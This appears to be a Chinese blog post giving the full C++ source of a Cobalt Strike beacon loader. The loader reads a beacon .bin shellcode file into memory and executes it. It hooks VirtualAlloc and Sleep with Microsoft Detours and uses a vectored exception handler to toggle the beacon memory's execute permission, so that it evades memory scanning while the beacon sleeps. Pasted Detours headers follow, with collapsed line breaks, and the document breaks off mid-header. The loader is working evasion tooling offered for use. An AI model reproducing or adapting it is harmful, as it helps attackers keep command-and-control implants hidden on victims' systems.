ConsoleApplication815项目(直接加载+VEH Hook Load)

上线图
在这里插入图片描述
ConsoleApplication815.cpp


#include <iostream>
#include<Windows.h>
#include "detours.h"
#include "detver.h"
#pragma comment(lib,"detours.lib")#pragma warning(disable:4996)LPVOID Beacon_address;
SIZE_T Beacon_data_len;
DWORD Beacon_Memory_address_flOldProtect;
HANDLE hEvent;BOOL Vir_FLAG = TRUE;
LPVOID shellcode_addr;//Hook VirtualAlloc函数的原因是我们需要知道Beacon在自展开时分配的可执行内存起始地址和大小是多少好在后面对这块内存取消X属性以免被扫描
static LPVOID(WINAPI* OldVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) = VirtualAlloc;
LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {Beacon_data_len = dwSize;Beacon_address = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);printf("分配大小:%d", Beacon_data_len);printf("分配地址:%llx \n", Beacon_address);return Beacon_address;
}//Hool Sleep函数是因为我们需要在Beacon进入Sleep后立马取消Beacon内存区域的X属性
static VOID(WINAPI* OldSleep)(DWORD dwMilliseconds) = Sleep;
void WINAPI NewSleep(DWORD dwMilliseconds)
{if (Vir_FLAG){VirtualFree(shellcode_addr, 0, MEM_RELEASE);Vir_FLAG = false;}printf("sleep时间:%d\n", dwMilliseconds);SetEvent(hEvent);OldSleep(dwMilliseconds);
}void Hook()
{DetourRestoreAfterWith(); //避免重复HOOK,恢复原来HOOKDetourTransactionBegin(); // 开始HOOKDetourUpdateThread(GetCurrentThread());  //刷新当前线程DetourAttach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);  //将拦截的函数附加到原函数的地址上,这里可以拦截多个函数  NewVirtualAllocDetourAttach((PVOID*)&OldSleep, NewSleep);    //将拦截的函数附加到原函数的地址上, 这里可以拦截多个函数  NewSleepDetourTransactionCommit(); //  提交HOOK
}void UnHook()
{DetourTransactionBegin();   //恢复原来HOOKDetourUpdateThread(GetCurrentThread());   //刷新当前线程DetourDetach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);  //解除hookDetourTransactionCommit();  //提交
}size_t GetSize(char* szFilePath)
{size_t size;FILE* f = fopen(szFilePath, "rb");fseek(f, 0, SEEK_END);  //fseek函数用于重定位流(数据流/文件)上的文件内部位置指针   //SEEK_END代表文件末尾size = ftell(f); //获取文件的 当前指针位置 相对于 文件首地址 的偏移字节数rewind(f);  //rewind() 函数将文件位置指示符设置为给定文件流的开头fclose(f);return size;
}unsigned char* ReadBinaryFile(char* szFilePath, size_t* size)
{unsigned char* p = NULL;FILE* f = NULL;size_t res = 0;*size = GetSize(szFilePath);  //if (*size == 0) return NULL;f = fopen(szFilePath, "rb");if (f == NULL){printf("Binary file does not exists!\n");return 0;}p = new unsigned char[*size];// Read filerewind(f);res = fread(p, sizeof(unsigned char), *size, f);fclose(f);if (res == 0){delete[] p;return NULL;}return p;
}BOOL is_Exception(DWORD64 Exception_addr)
{if (Exception_addr < ((DWORD64)Beacon_address + Beacon_data_len) && Exception_addr >(DWORD64)Beacon_address){printf("地址符合:%llx\n", Exception_addr);return true;}printf("地址不符合:%llx\n", Exception_addr);return false;
}//设置VEH异常处理函数,用来在因内存X属性取消后触发异常时恢复X属性
LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)
{printf("FirstVectExcepHandler\n");printf("异常错误码:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);printf("线程地址:%llx\n", pExcepInfo->ContextRecord->Rip);if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005 && is_Exception(pExcepInfo->ContextRecord->Rip))    //判断异常错误码是否等于0xc0000005,并且调用is_Exception函数来判断pExcepInfo->ContextRecord->Rip是否符合某个条件。pExcepInfo 是一个指向异常信息结构体 EXCEPINFO 的指针,用于存储关于异常的详细信息,ContextRecord 是 EXCEPTION_RECORD 结构体的一个成员,它是一个指向上下文记录的指针,其中包含有关引发异常的线程的上下文信息{printf("恢复Beacon内存属性\n");VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);  //恢复beacon内存属性return EXCEPTION_CONTINUE_EXECUTION;}return EXCEPTION_CONTINUE_SEARCH;
}//然后创建一个线程用来在Beacon进入睡眠之后立刻取消Beacon内存区域的X属性
DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)
{printf("Beacon_set_Memory_attributes启动\n");while (true)  {WaitForSingleObject(hEvent, INFINITE);   //INFINITE表示等待时间无限长,直到收到信号为止printf("设置Beacon内存属性不可执行\n");VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);   //内存属性ResetEvent(hEvent);     //重置事件对象}return 0;
}int main()
{//创建事件用来同步线程hEvent = CreateEvent(NULL, TRUE, false, NULL);   AddVectoredExceptionHandler(1, &FirstVectExcepHandler);   //表示注册一个优先级为 1 的向量化异常处理程序,并将其指向名为 FirstVectExcepHandler 的函数。当发生相应的异常时,被注册的处理程序 FirstVectExcepHandler 将会被调用。Hook();HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);   //创建线程CloseHandle(hThread1);   //关闭句柄unsigned char* BinData = NULL;size_t size = 0;//最后就是读取Beacon.bin加载进内存执行了char* szFilePath = "F:\\Tools\\beacon811.bin";    BinData = ReadBinaryFile(szFilePath, &size);    //ReadBinaryFile函数能直接读取二进制文件shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);    //申请内存空间memcpy(shellcode_addr, BinData, size);    //将内存复制进去VirtualProtect(shellcode_addr, size, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);   //修改内存属性(*(int(*)()) shellcode_addr)();UnHook();return 0;
}//整体思路:Beacon进入睡眠就取消它内存的可执行属性,等Beacon线程醒来时触发异常交由VEH异常处理函数恢复内存的可执行属性,然后Beacon执行完成后又进入睡眠一直重复上述过程

detver.h

//
//
//  Common version parameters.
//
//  Microsoft Research Detours Package, Version 3.0 Build_316.
//
//  Copyright (c) Microsoft Corporation.  All rights reserved.
//#ifndef DETOURS_STRINGIFY
#define DETOURS_STRINGIFY(x)    DETOURS_STRINGIFY_(x)
#define DETOURS_STRINGIFY_(x)    #x
#endif#define VER_FILEFLAGSMASK   0x3fL
#define VER_FILEFLAGS       0x0L
#define VER_FILEOS          0x00040004L
#define VER_FILETYPE        0x00000002L
#define VER_FILESUBTYPE     0x00000000L#define VER_DETOURS_BITS    DETOUR_STRINGIFY(DETOURS_BITS)

detours.h

/
//
//  Core Detours Functionality (detours.h of detours.lib)
//
//  Microsoft Research Detours Package, Version 4.0.1
//
//  Copyright (c) Microsoft Corporation.  All rights reserved.
//#pragma once
#ifndef _DETOURS_H_
#define _DETOURS_H_#define DETOURS_VERSION     0x4c0c1   // 0xMAJORcMINORcPATCH//
//#ifdef DETOURS_INTERNAL#define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS 1
#define _ARM_WINAPI_PARTITION_DESKTOP_SDK_AVAILABLE 1#pragma warning(disable:4068) // unknown pragma (suppress)#if _MSC_VER >= 1900
#pragma warning(push)
#pragma warning(disable:4091) // empty typedef
#endif// Suppress declspec(dllimport) for the sake of Detours
// users that provide kernel32 functionality themselves.
// This is ok in the mainstream case, it will just cost
// an extra instruction calling some functions, which
// LTCG optimizes away.
//
#define _KERNEL32_ 1
#define _USER32_ 1#include <windows.h>
#if (_MSC_VER < 1310)
#else
#pragma warning(push)
#if _MSC_VER > 1400
#pragma warning(disable:6102 6103) // /analyze warnings
#endif
#include <strsafe.h>
#include <intsafe.h>
#pragma warning(pop)
#endif
#include <crtdbg.h>// Allow Detours to cleanly compile with the MingW toolchain.
//
#ifdef __GNUC__
#define __try
#define __except(x) if (0)
#include <strsafe.h>
#include <intsafe.h>
#endif// From winerror.h, as this error isn't found in some SDKs:
//
// MessageId: ERROR_DYNAMIC_CODE_BLOCKED
//
// MessageText:
//
// The operation was blocked as the process prohibits dynamic code generation.
//
#define ERROR_DYNAMIC_CODE_BLOCKED       1655L#endif // DETOURS_INTERNAL//
//#undef DETOURS_X64
#undef DETOURS_X86
#undef DETOURS_IA64
#undef DETOURS_ARM
#undef DETOURS_ARM64
#undef DETOURS_BITS
#undef DETOURS_32BIT
#undef DETOURS_64BIT#if defined(_X86_)
#define DETOURS_X86
#define DETOURS_OPTION_BITS 64#elif defined(_AMD64_)
#define DETOURS_X64
#define DETOURS_OPTION_BITS 32#elif defined(_IA64_)
#define DETOURS_IA64
#define DETOURS_OPTION_BITS 32#elif defined(_ARM_)
#define DETOURS_ARM#elif defined(_ARM64_)
#define DETOURS_ARM64#else
#error Unknown architecture (x86, amd64, ia64, arm, arm64)
#endif#ifdef _WIN64
#undef DETOURS_32BIT
#define DETOURS_64BIT 1
#define DETOURS_BITS 64
// If all 64bit kernels can run one and only one 32bit architecture.
//#define DETOURS_OPTION_BITS 32
#else
#define DETOURS_32BIT 1
#undef DETOURS_64BIT
#define DETOURS_BITS 32
// If all 64bit kernels can run one and only one 32bit architecture.
//#define DETOURS_OPTION_BITS 32
#endif/// Helper Macros.
//
#define DETOURS_STRINGIFY_(x)    #x
#define DETOURS_STRINGIFY(x)    DETOURS_STRINGIFY_(x)#define VER_DETOURS_BITS    DETOURS_STRINGIFY(DETOURS_BITS)//
//#if (_MSC_VER < 1299) && !defined(__MINGW32__)
typedef LONG LONG_PTR;
typedef ULONG ULONG_PTR;
#endif/ SAL 2.0 Annotations w/o SAL.
//
//  These definitions are include so that Detours will build even if the
//  compiler doesn't have full SAL 2.0 support.
//
#ifndef DETOURS_DONT_REMOVE_SAL_20#ifdef DETOURS_TEST_REMOVE_SAL_20
#undef _Analysis_assume_
#undef _Benign_race_begin_
#undef _Benign_race_end_
#undef _Field_range_
#undef _Field_size_
#undef _In_
#undef _In_bytecount_
#undef _In_count_
#undef __in_ecount
#undef _In_opt_
#undef _In_opt_bytecount_
#undef _In_opt_count_
#undef _In_opt_z_
#undef _In_range_
#undef _In_reads_
#undef _In_reads_bytes_
#undef _In_reads_opt_
#undef _In_reads_opt_bytes_
#undef _In_reads_or_z_
#undef _In_z_
#undef _Inout_
#undef _Inout_opt_
#undef _Inout_z_count_
#undef _Out_
#undef _Out_opt_
#undef _Out_writes_
#undef _Outptr_result_maybenull_
#undef _Readable_bytes_
#undef _Success_
#undef _Writable_bytes_
#undef _Pre_notnull_
#endif#if defined(_Deref_out_opt_z_) && !defined(_Outptr_result_maybenull_)
#define _Outptr_result_maybenull_ _Deref_out_opt_z_
#endif#if defined(_In_count_) && !defined(_In_reads_)
#define _In_reads_(x) _In_count_(x)
#endif#if defined(_In_opt_count_) && !defined(_In_reads_opt_)
#define _In_reads_opt_(x) _In_opt_count_(x)
#endif#if defined(_In_opt_bytecount_) && !defined(_In_reads_opt_bytes_)
#define _In_reads_opt_bytes_(x) _In_opt_bytecount_(x)
#endif#if defined(_In_bytecount_) && !defined(_In_reads_bytes_)
#define _In_reads_bytes_(x) _In_bytecount_(x)
#endif#ifndef _In_
#define _In_
#endif#ifndef _In_bytecount_
#define _In_bytecount_(x)
#endif#ifndef _In_count_
#define _In_count_(x)
#endif#ifndef __in_ecount
#define __in_ecount(x)
#endif#ifndef _In_opt_
#define _In_opt_
#endif#ifndef _In_opt_bytecount_
#define _In_opt_bytecount_(x)
#endif#ifndef _In_opt_count_
#define _In_opt_count_(x)
#endif#ifndef _In_opt_z_
#define _In_opt_z_
#endif#ifndef _In_range_
#define _In_range_(x,y)
#endif#ifndef _In_reads_
#define _In_reads_(x)
#endif#ifndef _In_reads_bytes_
#define _In_reads_bytes_(x)
#endif#ifndef _In_reads_opt_
#define _In_reads_opt_(x)
#endif#ifndef _In_reads_opt_bytes_
#define _In_reads_opt_bytes_(x)
#endif#ifndef _In_reads_or_z_
#define _In_reads_or_z_
#endif#ifndef _In_z_
#define _In_z_
#endif#ifndef _Inout_
#define _Inout_
#endif#ifndef _Inout_opt_
#define _Inout_opt_
#endif#ifndef _Inout_z_count_
#define _Inout_z_count_(x)
#endif#ifndef _Out_
#define _Out_
#endif#ifndef _Out_opt_
#define _Out_opt_
#endif#ifndef _Out_writes_
#define _Out_writes_(x)
#endif#ifndef _Outptr_result_maybenull_
#define _Outptr_result_maybenull_
#endif#ifndef _Writable_bytes_
#define _Writable_bytes_(x)
#endif#ifndef _Readable_bytes_
#define _Readable_bytes_(x)
#endif#ifndef _Success_
#define _Success_(x)
#endif#ifndef _Pre_notnull_
#define _Pre_notnull_
#endif#ifdef DETOURS_INTERNAL#pragma warning(disable:4615) // unknown warning type (suppress with older compilers)#ifndef _Benign_race_begin_
#define _Benign_race_begin_
#endif#ifndef _Benign_race_end_
#define _Benign_race_end_
#endif#ifndef _Field_size_
#define _Field_size_(x)
#endif#ifndef _Field_range_
#define _Field_range_(x,y)
#endif#ifndef _Analysis_assume_
#define _Analysis_assume_(x)
#endif#endif // DETOURS_INTERNAL
#endif // DETOURS_DONT_REMOVE_SAL_20//
//
#ifndef GUID_DEFINED
#define GUID_DEFINED
typedef struct  _GUID
{DWORD Data1;WORD Data2;WORD Data3;BYTE Data4[8];
} GUID;#ifdef INITGUID
#define DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \const GUID name \= { l, w1, w2, { b1, b2,  b3,  b4,  b5,  b6,  b7,  b8 } }
#else
#define DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \const GUID name
#endif // INITGUID
#endif // !GUID_DEFINED#if defined(__cplusplus)
#ifndef _REFGUID_DEFINED
#define _REFGUID_DEFINED
#define REFGUID             const GUID &
#endif // !_REFGUID_DEFINED
#else // !__cplusplus
#ifndef _REFGUID_DEFINED
#define _REFGUID_DEFINED
#define REFGUID             const GUID * const
#endif // !_REFGUID_DEFINED
#endif // !__cplusplus#ifndef ARRAYSIZE
#define ARRAYSIZE(x)    (sizeof(x)/sizeof(x[0]))
#endif//
//#ifdef __cplusplus
extern "C" {
#endif // __cplusplus/// Instruction Target Macros.//
#define DETOUR_INSTRUCTION_TARGET_NONE          ((PVOID)0)
#define DETOUR_INSTRUCTION_TARGET_DYNAMIC       ((PVOID)(LONG_PTR)-1)
#define DETOUR_SECTION_HEADER_SIGNATURE         0x00727444   // "Dtr\0"extern const GUID DETOUR_EXE_RESTORE_GUID;extern const GUID DETOUR_EXE_HELPER_GUID;#define DETOUR_TRAMPOLINE_SIGNATURE             0x21727444  // Dtr!typedef struct _DETOUR_TRAMPOLINE DETOUR_TRAMPOLINE, * PDETOUR_TRAMPOLINE;#ifndef DETOUR_MAX_SUPPORTED_IMAGE_SECTION_HEADERS
#define DETOUR_MAX_SUPPORTED_IMAGE_SECTION_HEADERS      32
#endif // !DETOUR_MAX_SUPPORTED_IMAGE_SECTION_HEADERS/// Binary Structures.//
#pragma pack(push, 8)typedef struct _DETOUR_SECTION_HEADER{DWORD       cbHeaderSize;DWORD       nSignature;DWORD       nDataOffset;DWORD       cbDataSize;DWORD       nOriginalImportVirtualAddress;DWORD       nOriginalImportSize;DWORD       nOriginalBoundImportVirtualAddress;DWORD       nOriginalBoundImportSize;DWORD       nOriginalIatVirtualAddress;DWORD       nOriginalIatSize;DWORD       nOriginalSizeOfImage;DWORD       cbPrePE;DWORD       nOriginalClrFlags;DWORD       reserved1;DWORD       reserved2;DWORD       reserved3;// Followed by cbPrePE bytes of data.} DETOUR_SECTION_HEADER, * PDETOUR_SECTION_HEADER;typedef struct _DETOUR_SECTION_RECORD{DWORD       cbBytes;DWORD       nReserved;GUID        guid;} DETOUR_SECTION_RECORD, * PDETOUR_SECTION_RECORD;typedef struct _DETOUR_CLR_HEADER{// Header versioningULONG                   cb;USHORT                  MajorRuntimeVersion;USHORT                  MinorRuntimeVersion;// Symbol table and startup informationIMAGE_DATA_DIRECTORY    MetaData;ULONG                   Flags;// Followed by the rest of the IMAGE_COR20_HEADER} DETOUR_CLR_HEADER, * PDETOUR_CLR_HEADER;typedef struct _DETOUR_EXE_RESTORE{DWORD               cb;DWORD               cbidh;DWORD               cbinh;DWORD               cbclr;PBYTE               pidh;PBYTE               pinh;PBYTE               pclr;IMAGE_DOS_HEADER    idh;union {IMAGE_NT_HEADERS    inh;        // all environments have this
#ifdef IMAGE_NT_OPTIONAL_HDR32_MAGIC    // some environments do not have thisIMAGE_NT_HEADERS32  inh32;
#endif
#ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC    // some environments do not have thisIMAGE_NT_HEADERS64  inh64;
#endif
#ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC    // some environments do not have thisBYTE                raw[sizeof(IMAGE_NT_HEADERS64) +sizeof(IMAGE_SECTION_HEADER) * DETOUR_MAX_SUPPORTED_IMAGE_SECTION_HEADERS];
#elseBYTE                raw[0x108 + sizeof(IMAGE_SECTION_HEADER) * DETOUR_MAX_SUPPORTED_IMAGE_SECTION_HEADERS];
#endif};DETOUR_CLR_HEADER   clr;} DETOUR_EXE_RESTORE, * PDETOUR_EXE_RESTORE;#ifdef IMAGE_NT_OPTIONAL_HDR64_MAGICC_ASSERT(sizeof(IMAGE_NT_HEADERS64) == 0x108);
#endif// The size can change, but assert for clarity due to the muddying #ifdefs.
#ifdef _WIN64C_ASSERT(sizeof(DETOUR_EXE_RESTORE) == 0x688);
#elseC_ASSERT(sizeof(DETOUR_EXE_RESTORE) == 0x678);
#endiftypedef struct _DETOUR_EXE_HELPER{DWORD               cb;DWORD               pid;DWORD               nDlls;CHAR                rDlls[4];} DETOUR_EXE_HELPER, * PDETOUR_EXE_HELPER;#pragma pack(pop)#define DETOUR_SECTION_HEADER_DECLARE(cbSectionSize) \
{ \sizeof(DETOUR_SECTION_HEADER),\DETOUR_SECTION_HEADER_SIGNATURE,\sizeof(DETOUR_SECTION_HEADER),\(cbSectionSize),\\0,\0,\0,\0,\\0,\0,\0,\0,\
}/ Binary Typedefs.//typedef BOOL(CALLBACK* PF_DETOUR_BINARY_BYWAY_CALLBACK)(_In_opt_ PVOID pContext,_In_opt_ LPCSTR pszFile,_Outptr_result_maybenull_ LPCSTR* ppszOutFile);typedef BOOL(CALLBACK* PF_DETOUR_BINARY_FILE_CALLBACK)(_In_opt_ PVOID pContext,_In_ LPCSTR pszOrigFile,_In_ LPCSTR pszFile,_Outptr_result_maybenull_ LPCSTR* ppszOutFile);typedef BOOL(CALLBACK* PF_DETOUR_BINARY_SYMBOL_CALLBACK)(_In_opt_ PVOID pContext,_In_ ULONG nOrigOrdinal,_In_ ULONG nOrdinal,_Out_ ULONG* pnOutOrdinal,_In_opt_ LPCSTR pszOrigSymbol,_In_opt_ LPCSTR pszSymbol,_Outptr_result_maybenull_ LPCSTR* ppszOutSymbol);typedef BOOL(CALLBACK* PF_DETOUR_BINARY_COMMIT_CALLBACK)(_In_opt_ PVOID pContext);typedef BOOL(CALLBACK* PF_DETOUR_ENUMERATE_EXPORT_CALLBACK)(_In_opt_ PVOID pContext,_In_ ULONG nOrdinal,_In_opt_ LPCSTR pszName,_In_opt_ PVOID pCode);typedef BOOL(CALLBACK* PF_DETOUR_IMPORT_FILE_CALLBACK)(_In_opt_ PVOID pContext,_In_opt_ HMODULE hModule,_In_opt_ LPCSTR pszFile);typedef BOOL(CALLBACK* PF_DETOUR_IMPORT_FUNC_CALLBACK)(_In_opt_ PVOID pContext,_In_ DWORD nOrdinal,_In_opt_ LPCSTR pszFunc,_In_opt_ PVOID pvFunc);// Same as PF_DETOUR_IMPORT_FUNC_CALLBACK but extra indirection on last parameter.typedef BOOL(CALLBACK* PF_DETOUR_IMPORT_FUNC_CALLBACK_EX)(_In_opt_ PVOID pContext,_In_ DWORD nOrdinal,_In_opt_ LPCSTR pszFunc,_In_opt_ PVOID* ppvFunc);typedef VOID* PDETOUR_BINARY;typedef VOID* PDETOUR_LOADED_BINARY; Transaction APIs.//LONG WINAPI DetourTransactionBegin(VOID);LONG WINAPI DetourTransactionAbort(VOID);LONG WINAPI DetourTransactionCommit(VOID);LONG WINAPI DetourTransactionCommitEx(_Out_opt_ PVOID** pppFailedPointer);LONG WINAPI DetourUpdateThread(_In_ HANDLE hThread);LONG WINAPI DetourAttach(_Inout_ PVOID* ppPointer,_In_ PVOID pDetour);LONG WINAPI DetourAttachEx(_Inout_ PVOID* ppPointer,_In_ PVOID pDetour,_Out_opt_ PDETOUR_TRAMPOLINE* ppRealTrampoline,_Out_opt_ PVOID* ppRealTarget,_Out_opt_ PVOID* ppRealDetour);LONG WINAPI DetourDetach(_Inout_ PVOID* ppPointer,_In_ PVOID pDetour);BOOL WINAPI DetourSetIgnoreTooSmall(_In_ BOOL fIgnore);BOOL WINAPI DetourSetRetainRegions(_In_ BOOL fRetain);PVOID WINAPI DetourSetSystemRegionLowerBound(_In_ PVOID pSystemRegionLowerBound);PVOID WINAPI DetourSetSystemRegionUpperBound(_In_ PVOID pSystemRegionUpperBound);// Code Functions.//PVOID WINAPI DetourFindFunction(_In_ LPCSTR pszModule,_In_ LPCSTR pszFunction);PVOID WINAPI DetourCodeFromPointer(_In_ PVOID pPointer,_Out_opt_ PVOID* ppGlobals);PVOID WINAPI DetourCopyInstruction(_In_opt_ PVOID pDst,_Inout_opt_ PVOID* ppDstPool,_In_ PVOID pSrc,_Out_opt_ PVOID* ppTarget,_Out_opt_ LONG* plExtra);BOOL WINAPI DetourSetCodeModule(_In_ HMODULE hModule,_In_ BOOL fLimitReferencesToModule);PVOID WINAPI DetourAllocateRegionWithinJumpBounds(_In_ LPCVOID pbTarget,_Out_ PDWORD pcbAllocatedSize);BOOL WINAPI DetourIsFunctionImported(_In_ PBYTE pbCode,_In_ PBYTE pbAddress);/ Loaded Binary Functions.//HMODULE WINAPI DetourGetContainingModule(_In_ PVOID pvAddr);HMODULE WINAPI DetourEnumerateModules(_In_opt_ HMODULE hModuleLast);PVOID WINAPI DetourGetEntryPoint(_In_opt_ HMODULE hModule);ULONG WINAPI DetourGetModuleSize(_In_opt_ HMODULE hModule);BOOL WINAPI DetourEnumerateExports(_In_ HMODULE hModule,_In_opt_ PVOID pContext,_In_ PF_DETOUR_ENUMERATE_EXPORT_CALLBACK pfExport);BOOL WINAPI DetourEnumerateImports(_In_opt_ HMODULE hModule,_In_opt_ PVOID pContext,_In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile,_In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK pfImportFunc);BOOL WINAPI DetourEnumerateImportsEx(_In_opt_ HMODULE hModule,_In_opt_ PVOID pContext,_In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile,_In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK_EX pfImportFuncEx);_Writable_bytes_(*pcbData)_Readable_bytes_(*pcbData)_Success_(return != NULL)PVOID WINAPI DetourFindPayload(_In_opt_ HMODULE hModule,_In_ REFGUID rguid,_Out_opt_ DWORD* pcbData);_Writable_bytes_(*pcbData)_Readable_bytes_(*pcbData)_Success_(return != NULL)PVOID WINAPI DetourFindPayloadEx(_In_ REFGUID rguid,_Out_opt_ DWORD* pcbData);DWORD WINAPI DetourGetSizeOfPayloads(_In_opt_ HMODULE hModule);BOOL WINAPI DetourFreePayload(_In_ PVOID pvData);/ Persistent Binary Functions.//PDETOUR_BINARY WINAPI DetourBinaryOpen(_In_ HANDLE hFile);_Writable_bytes_(*pcbData)_Readable_bytes_(*pcbData)_Success_(return != NULL)PVOID WINAPI DetourBinaryEnumeratePayloads(_In_ PDETOUR_BINARY pBinary,_Out_opt_ GUID* pGuid,_Out_ DWORD* pcbData,_Inout_ DWORD* pnIterator);_Writable_bytes_(*pcbData)_Readable_bytes_(*pcbData)_Success_(return != NULL)PVOID WINAPI DetourBinaryFindPayload(_In_ PDETOUR_BINARY pBinary,_In_ REFGUID rguid,_Out_ DWORD* pcbData);PVOID WINAPI DetourBinarySetPayload(_In_ PDETOUR_BINARY pBinary,_In_ REFGUID rguid,_In_reads_opt_(cbData) PVOID pData,_In_ DWORD cbData);BOOL WINAPI DetourBinaryDeletePayload(_In_ PDETOUR_BINARY pBinary, _In_ REFGUID rguid);BOOL WINAPI DetourBinaryPurgePayloads(_In_ PDETOUR_BINARY pBinary);BOOL WINAPI DetourBinaryResetImports(_In_ PDETOUR_BINARY pBinary);BOOL WINAPI DetourBinaryEditImports(_In_ PDETOUR_BINARY pBinary,_In_opt_ PVOID pContext,_In_opt_ PF_DETOUR_BINARY_BYWAY_CALLBACK pfByway,_In_opt_ PF_DETOUR_BINARY_FILE_CALLBACK pfFile,_In_opt_ PF_DETOUR_BINARY_SYMBOL_CALLBACK pfSymbol,_In_opt_ PF_DETOUR_BINARY_COMMIT_CALLBACK pfCommit);BOOL WINAPI DetourBinaryWrite(_In_ PDETOUR_BINARY pBinary, _In_ HANDLE hFile);BOOL WINAPI DetourBinaryClose(_In_ PDETOUR_BINARY pBinary);/// Create Process & Load Dll.//_Success_(return != NULL)PVOID WINAPI DetourFindRemotePayload(_In_ HANDLE hProcess,_In_ REFGUID rguid,_Out_opt_ DWORD* pcbData);typedef BOOL(WINAPI* PDETOUR_CREATE_PROCESS_ROUTINEA)(_In_opt_ LPCSTR lpApplicationName,_Inout_opt_ LPSTR lpCommandLine,_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,_In_ BOOL bInheritHandles,_In_ DWORD dwCreationFlags,_In_opt_ LPVOID lpEnvironment,_In_opt_ LPCSTR lpCurrentDirectory,_In_ LPSTARTUPINFOA lpStartupInfo,_Out_ LPPROCESS_INFORMATION lpProcessInformation);typedef BOOL(WINAPI* PDETOUR_CREATE_PROCESS_ROUTINEW)(_In_opt_ LPCWSTR lpApplicationName,_Inout_opt_ LPWSTR lpCommandLine,_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,_In_ BOOL bInheritHandles,_In_ DWORD dwCreationFlags,_In_opt_ LPVOID lpEnvironment,_In_opt_ LPCWSTR lpCurrentDirectory,_In_ LPSTARTUPINFOW lpStartupInfo,_Out_ LPPROCESS_INFORMATION lpProcessInformation);BOOL WINAPI DetourCreateProcessWithDllA(_In_opt_ LPCSTR lpApplicationName,_Inout_opt_ LPSTR lpCommandLine,_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,_In_ BOOL bInheritHandles,_In_ DWORD dwCreationFlags,_In_opt_ LPVOID lpEnvironment,_In_opt_ LPCSTR lpCurrentDirectory,_In_ LPSTARTUPINFOA lpStartupInfo,_Out_ LPPROCESS_INFORMATION lpProcessInformation,_In_ LPCSTR lpDllName,_In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA);BOOL WINAPI DetourCreateProcessWithDllW(_In_opt_ LPCWSTR lpApplicationName,_Inout_opt_ LPWSTR lpCommandLine,_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,_In_ BOOL bInheritHandles,_In_ DWORD dwCreationFlags,_In_opt_ LPVOID lpEnvironment,_In_opt_ LPCWSTR lpCurrentDirectory,_In_ LPSTARTUPINFOW lpStartupInfo,_Out_ LPPROCESS_INFORMATION lpProcessInformation,_In_ LPCSTR lpDllName,_In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW);#ifdef UNICODE
#define DetourCreateProcessWithDll      DetourCreateProcessWithDllW
#define PDETOUR_CREATE_PROCESS_ROUTINE  PDETOUR_CREATE_PROCESS_ROUTINEW
#else
#define DetourCreateProcessWithDll      DetourCreateProcessWithDllA
#define PDETOUR_CREATE_PROCESS_ROUTINE  PDETOUR_CREATE_PROCESS_ROUTINEA
#endif // !UNICODEBOOL WINAPI DetourCreateProcessWithDllExA(_In_opt_ LPCSTR lpApplicationName,_Inout_opt_ LPSTR lpCommandLine,_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,_In_ BOOL bInheritHandles,_In_ DWORD dwCreationFlags,_In_opt_ LPVOID lpEnvironment,_In_opt_ LPCSTR lpCurrentDirectory,_In_ LPSTARTUPINFOA lpStartupInfo,_Out_ LPPROCESS_INFORMATION lpProcessInformation,_In_ LPCSTR lpDllName,_In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA);BOOL WINAPI DetourCreateProcessWithDllExW(_In_opt_ LPCWSTR lpApplicationName,_Inout_opt_  LPWSTR lpCommandLine,_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,_In_ BOOL bInheritHandles,_In_ DWORD dwCreationFlags,_In_opt_ LPVOID lpEnvironment,_In_opt_ LPCWSTR lpCurrentDirectory,_In_ LPSTARTUPINFOW lpStartupInfo,_Out_ LPPROCESS_INFORMATION lpProcessInformation,_In_ LPCSTR lpDllName,_In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW);#ifdef UNICODE
#define DetourCreateProcessWithDllEx    DetourCreateProcessWithDllExW
#else
#define DetourCreateProcessWithDllEx    DetourCreateProcessWithDllExA
